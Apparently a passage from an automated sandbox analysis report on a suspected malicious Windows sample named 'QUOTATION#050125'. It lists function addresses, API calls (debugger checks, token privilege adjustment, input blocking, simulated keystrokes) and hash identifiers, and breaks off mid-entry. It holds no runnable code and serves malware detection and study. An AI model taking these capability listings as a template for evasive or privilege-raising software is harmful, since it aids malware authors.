Instruction Fuzzy Hash: 9C51CC346046059FC704DF28C484EAABBE4FF0A318F14855EEA6A8B3A1CB34EC44CF95

Function 004B2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004B271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004B2724
UnhandledExceptionFilter.KERNEL32(?), ref: 004B2731

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 43e9429c1bca29383ae8ebcad8dc673b6cde28143b5e0775e7bff8479bb048ce
Instruction ID: 914a0adfaea0100c1b7460f258149864c9d50cf005d6e5a9c1298f5846b35960
Opcode Fuzzy Hash: 43e9429c1bca29383ae8ebcad8dc673b6cde28143b5e0775e7bff8479bb048ce
Instruction Fuzzy Hash: AD31D67494121C9BCB21DF69DD887DDBBB8AF18310F5041EAE81CA7260EB749F858F58

Function 004F51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004F51DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 004F5238
SetErrorMode.KERNEL32(00000000), ref: 004F52A1

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: f6f74a7df469a80c16858a169fb5503b3c59d518d9b6f420e50f35980f494984
Instruction ID: b8bb4b3f6bf5bf159ceed5f2d3e403b4fdb2d53c97cbff54349f33626d5820bd
Opcode Fuzzy Hash: f6f74a7df469a80c16858a169fb5503b3c59d518d9b6f420e50f35980f494984
Instruction Fuzzy Hash: 48318035A00508DFDB00DF55D8C4EADBBB4FF08318F05809AE905AB392CB35E845CBA4

Function 004E16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004E170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004E173A
GetLastError.KERNEL32 ref: 004E174A

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 4244140340-0
Opcode ID: ab3d9778b390f4a2f5c6c37d17827fa980751017be44e1c4712d017a4ad8a28f
Instruction ID: 79f62bb6296332b8e800a35fc4167d0044afed0fbb2bc06d03fceb464a7e45fc
Opcode Fuzzy Hash: ab3d9778b390f4a2f5c6c37d17827fa980751017be44e1c4712d017a4ad8a28f
Instruction Fuzzy Hash: 28110EB2440304AFD718EF65DC86DABBBB8EB08B14B20852EE05697251EB74BC45CA24

Function 004ED5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004ED608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 004ED645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004ED650

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 19a2be8eed26b9b5d15e447b3990420ea72bcd130995986ea742408e1e93b2ac
Instruction ID: cf05605c7e51b1cc0f0120692949183780da3e4031473f2b723cad09e8a2efd9
Opcode Fuzzy Hash: 19a2be8eed26b9b5d15e447b3990420ea72bcd130995986ea742408e1e93b2ac
Instruction Fuzzy Hash: A2117C75E41228BBDB108FA59C44FEFBFBCEB45B50F108512F914E7290C2704A058BA1

Function 004E1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004E168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004E16A1
FreeSid.ADVAPI32(?), ref: 004E16B1

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: ed247a8c706a62d5c3ba2207876cda624ec74071c5dd8627ce3b853b01a6f522
Instruction ID: 6fbc547eb1ee2f5fdb5422d58afb51b7a6977228b2bda79c16601930b92afc02
Opcode Fuzzy Hash: ed247a8c706a62d5c3ba2207876cda624ec74071c5dd8627ce3b853b01a6f522
Instruction Fuzzy Hash: CAF04471980308FBDB00CFE08C89EAEBBBCEB08200F008561E500E2180E335AA089A50

Function 004A4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(004B28E9,?,004A4CBE,004B28E9,005488B8,0000000C,004A4E15,004B28E9,00000002,00000000,?,004B28E9), ref: 004A4D09
TerminateProcess.KERNEL32(00000000,?,004A4CBE,004B28E9,005488B8,0000000C,004A4E15,004B28E9,00000002,00000000,?,004B28E9), ref: 004A4D10
ExitProcess.KERNEL32 ref: 004A4D22

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 2ee342aca37687283dcd08439171f110a08d2e85df1912e5f612fb1c818e0496
Instruction ID: 768608777b43e02c2f540ac916bbc6d18e05dd8f66deb0d1b5a4bd41f250e2f3
Opcode Fuzzy Hash: 2ee342aca37687283dcd08439171f110a08d2e85df1912e5f612fb1c818e0496
Instruction Fuzzy Hash: B6E04631080108ABCF21AF25DD09A893F29EBA2785B008419FD148A222CB7ADE42DA84

Function 004BC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 004BC36C

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: bcfb6c0d50c8b02ee19ad00bc29859849801c2e8773d76e70fb3b9c8c18bca22
Instruction ID: ac7b2f67b2afce3f5b7df3c6d8fa33577220ce71ea71d8ca07df4bfd80d3471f
Opcode Fuzzy Hash: bcfb6c0d50c8b02ee19ad00bc29859849801c2e8773d76e70fb3b9c8c18bca22
Instruction Fuzzy Hash: FF4149769002186FCB249FB9CCC8DFB77B8EB84314F5042AEF905C7280E6749D818B68

Function 004DD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 004DD28C

Strings

X64, xrefs: 004DD2A8

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 8c4ae295911cbb1f561c8ebfd84af2e130f140eee802dd15371686efb22c78e0
Instruction ID: cd9209802f0a2d7da6ccf6d932fb768466d361bb65c07494aa762f3c896c9db5
Opcode Fuzzy Hash: 8c4ae295911cbb1f561c8ebfd84af2e130f140eee802dd15371686efb22c78e0
Instruction Fuzzy Hash: 8DD0C9B480111DEACF94DB90DC8CDDDB77CBB14345F104192F146A2100D73495499F10

Function 0048CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 004D0C40
p#U, xrefs: 0048CF7F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#U
API String ID: 0-1255281238
Opcode ID: 784cc606c97a7c32dfdce76f872675730e65858a395950df526dff9ee3b0d743
Instruction ID: 75b7144e567113001f3a22308c9c8f71695b8582d942aba6cc42133f1f4943e0
Opcode Fuzzy Hash: 784cc606c97a7c32dfdce76f872675730e65858a395950df526dff9ee3b0d743
Instruction Fuzzy Hash: F7328C30900218DBDF14EF90D894BEEB7B5BF05308F10485BE906AB382D779AD46CB69

Function 004F68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004F6918
FindClose.KERNEL32(00000000), ref: 004F6961

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: a254390dcd4416b06317858cbba2f23231a1d479a541eab2e067e81541361a22
Instruction ID: 10372af33659c666ba78afbfa44b528c870bdcd14474ec4f86cecbb17aca7d08
Opcode Fuzzy Hash: a254390dcd4416b06317858cbba2f23231a1d479a541eab2e067e81541361a22
Instruction Fuzzy Hash: 4911AC756042009FD710DF2AD484A2ABBE1EF84328F15C69AE5698B7A2C774EC45CB91

Function 004F37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00504891,?,?,00000035,?), ref: 004F37E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00504891,?,?,00000035,?), ref: 004F37F4

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 6fbd6d3a8349f8f1699fd5ee2aacf90e4a3096a4116f8533ae87567dbf139ecb
Instruction ID: 21f1190cdc7db36b2e0a9d216a1ce8c3de8a224819afb0e548548dc3f02db9eb
Opcode Fuzzy Hash: 6fbd6d3a8349f8f1699fd5ee2aacf90e4a3096a4116f8533ae87567dbf139ecb
Instruction Fuzzy Hash: 15F055B46042282AE72027668C4CFEB7AAEEFC4761F00412AF209D2281CAA08D44C7B4

Function 004EB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004EB25D
keybd_event.USER32(?,75CEA2E0,?,00000000), ref: 004EB270

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 77b8ef51bcd2970a44ccb3aa78b8665dcaf264fda7427185234b5747fb92992e
Instruction ID: d90cb7b50061c4c62b9c5814a3c7aa3ade8ccc1ba7594d7af125a80a3a8eab42
Opcode Fuzzy Hash: 77b8ef51bcd2970a44ccb3aa78b8665dcaf264fda7427185234b5747fb92992e
Instruction Fuzzy Hash: 79F01D7184428DABDB059FA1C805BEF7FB4FF04305F00844AF955A5191C37D86159F94

Function 004E10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004E11FC), ref: 004E10D4
CloseHandle.KERNEL32(?,?,004E11FC), ref: 004E10E9

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 2071be694d1ec0d132201c051ad81c5dc67f2913e68ebc5b8eecd94a66205aae
Instruction ID: 29b07183a892266c5e37151220671d9abea165089070f4742cc138a28113a6b6
Opcode Fuzzy Hash: 2071be694d1ec0d132201c051ad81c5dc67f2913e68ebc5b8eecd94a66205aae
Instruction Fuzzy Hash: A8E04F32044610AFEB252B12FC09EB77BA9EB04310B20C82EF4A6804B1DB626C94EB14

Function 004B676B Relevance: 1.8, APIs: 1, Instructions: 269COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004B6766,?,?,00000008,?,?,004BFEFE,00000000), ref: 004B6998

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f039419b2b35b2f3b7d1ce6102a3185cce52bce044d2de03404178dd61a6e2f3
Instruction ID: 8d09db03c75ac2e8a06c313148b0c2bbad033bcdbab81eba87235f40ca74908c
Opcode Fuzzy Hash: f039419b2b35b2f3b7d1ce6102a3185cce52bce044d2de03404178dd61a6e2f3
Instruction Fuzzy Hash: 2BB16D715106088FDB14CF28C486BA57BE0FF05364F268659E899CF3A1C33DD992CB54

Function 0049B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 004D851F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 87d65868777c3f48c43ee0eb9babe4f9642a606548a40587dc518162302bf491
Instruction ID: 53b290b2201a0617578c0bb53c00f1f8f1ab42b830f68472bc909595fdf9ebbf
Opcode Fuzzy Hash: 87d65868777c3f48c43ee0eb9babe4f9642a606548a40587dc518162302bf491
Instruction Fuzzy Hash: CB125E719002299BCF24CF58D9906FEBBB5FF48310F1481ABE809EB351DB349A81DB95

Function 004A0698 Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004A06B1

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 70315620f3b7bada135f629e6327cf1f79a2ef747b15f28a77d67d30b3acbde3
Instruction ID: 0dbc1754112cc7617a80665366d159f66ca8d1d60c9bef85da1b1a929603452d
Opcode Fuzzy Hash: 70315620f3b7bada135f629e6327cf1f79a2ef747b15f28a77d67d30b3acbde3
Instruction Fuzzy Hash: 8441BCB1911304CBEB28CF59D9C569EBBF4FB69304F24802AC405EB390E338A944CF54

Function 004A1394 Relevance: 1.6, Strings: 1, Instructions: 356COMMON

Download Yara Rule

Strings

b(O, xrefs: 004A1398

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID: b(O
API String ID: 0-254555383
Opcode ID: 493334a69eea69143b7be371c2d796bf43b2bf1b35428353997cfc1ce9866b6d
Instruction ID: c82ef0f72e913494478877433d1457b68b8ed788debb7ed3932e2a5005ddb640
Opcode Fuzzy Hash: 493334a69eea69143b7be371c2d796bf43b2bf1b35428353997cfc1ce9866b6d
Instruction Fuzzy Hash: 89D1F6721081A20ACB2D4A3D857003BBFF16A63361B0D479FD4F7CB6E2ED28D955E664

Function 004FEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 004FEABD

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: c78b5e917b2e649dbad21bb282a59b1ff39d77af10ef614355ab47cc7e4839e5
Instruction ID: 8c179c13772cb97c85babbcb7a54c7ed7de8c4f7ef45952aa20d0aea648961e7
Opcode Fuzzy Hash: c78b5e917b2e649dbad21bb282a59b1ff39d77af10ef614355ab47cc7e4839e5
Instruction Fuzzy Hash: F8E012312002049FD710EF5AD444D9ABBD9AF59764F00841BFD45C7361D674A8418B95

Function 004A09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,004A03EE), ref: 004A09DA

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 886050c2857fa36bd40fe45ed205b3082ea12b294f575e94fee10346255a9bc3
Instruction ID: e14fce5605c478ed0b03a4ad8daecdcaef16ecdad4a4d8edca8155a3fffd2d4a
Opcode Fuzzy Hash: 886050c2857fa36bd40fe45ed205b3082ea12b294f575e94fee10346255a9bc3
Instruction Fuzzy Hash:

Function 004A781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 004A798B

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
